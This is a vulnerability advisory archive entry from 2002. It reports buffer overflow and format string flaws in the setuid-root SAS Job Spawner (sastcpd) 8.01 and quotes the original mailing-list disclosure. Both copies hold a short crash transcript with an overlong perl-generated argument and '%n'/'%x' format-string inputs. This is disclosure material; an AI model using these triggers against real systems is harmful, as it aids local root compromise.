SAS Job Spawner Buffer Overflow and Format String Bug Let Local Users Execute Arbitrary Code on the System with Root Privileges and Gain Root Privileges on the System
|
|
SecurityTracker Alert ID: 1003393
|
|
SecurityTracker URL: http://securitytracker.com/id?1003393
|
|
CVE Reference: GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: Jan 29 2002
|
Impact: Execution of arbitrary code via local system, Root access via local system
|
Fix Available: Yes
Vendor Confirmed: Yes
|
Version(s): SAS Job Spawner for Open Systems version 8.01
|
Description: Ministry-of-Peace reported a buffer overflow and format string vulnerability in the SAS Job Spawner (sastcpd). A local user can obtain root privileges on the system.
It is reported that sastcpd is installed with set user id (setuid) 'root' privileges by default. So, a local user can cause arbitrary
code to be executed with root privileges, giving that user root access on the system.
A demonstration exploit transcript is provided:
$
sastcpd `perl -e "print 'A' x 1200"`
Invalid argument: AAAA[..cut..]AAAA.
Segmentation fault (core dumped)
$ ls -la core
-rw-------
1 root teknix 1454382 Jan 28 04:22 core
$ sastcpd %n
Segmentation fault (core dumped)
$ sastcpd %x
Invalid argument:
2.
The report credits Digital Shadow with discovering this flaw.
|
Impact: A local user can execute arbitrary code on the system with root level privileges, giving that user root access on the system.
|
Solution: The vendor reportedly notes that these problems were fixed in version 8.2. Contact the vendor for an update.
|
Vendor URL: www.sas.com/SASHome.html (Links to External Site)
|
Cause: Boundary error, Input validation error
|
Underlying OS: Linux (Any), UNIX (Any)
|
Reported By: "Wodahs Latigid" <wodahs@mail.com>
|
Message History:
This archive entry has one or more follow-up message(s) listed below.
|
Source Message Contents
|
Date: Tue, 29 Jan 2002 09:59:41 +0000
From: "Wodahs Latigid" <wodahs@mail.com>
Subject: [VulnWatch] sastcpd Buffer Overflow and Format String Vulnerabilities
|
----------------------------------------------------------
sastcpd Buffer Overflow and Format String Vulnerabilities
Ministry-of-Peace - www.ministryofpeace.co.uk
----------------------------------------------------------
SYNOPSIS
"SAS software provides the foundation, tools, and
solutions for data analysis, report generation,
and enterprise-wide information delivery."
The "SAS Job Spawner", sastcpd, contains both a buffer
overflow and a format string vulnerability.
SAS Support say that these problems were fixed in version
8.2 of this product, but we are unable to confirm as we
do not have access to this version.
IMPACT
sastcpd is installed setuid root by default, and therefore
full root privileges can be obtained through exploitation
of either of these vulnerabilities.
DETAILS
Version tested:
SAS Job Spawner for Open Systems version 8.01
$ sastcpd `perl -e "print 'A' x 1200"`
Invalid argument: AAAA[..cut..]AAAA.
Segmentation fault (core dumped)
$ ls -la core
-rw------- 1 root teknix 1454382 Jan 28 04:22 core
$ sastcpd %n
Segmentation fault (core dumped)
$ sastcpd %x
Invalid argument: 2.
CREDITS
Vulnerability discovered by Digital Shadow
INFO
Security Advisory #05
Published: 29th January 2002
--
_______________________________________________
Sign-up for your own FREE Personalized E-mail at Mail.com
http://www.mail.com/?sr=signup
Win a ski trip!
http://www.nowcode.com/register.asp?affiliate=1net2phone3a
|
|
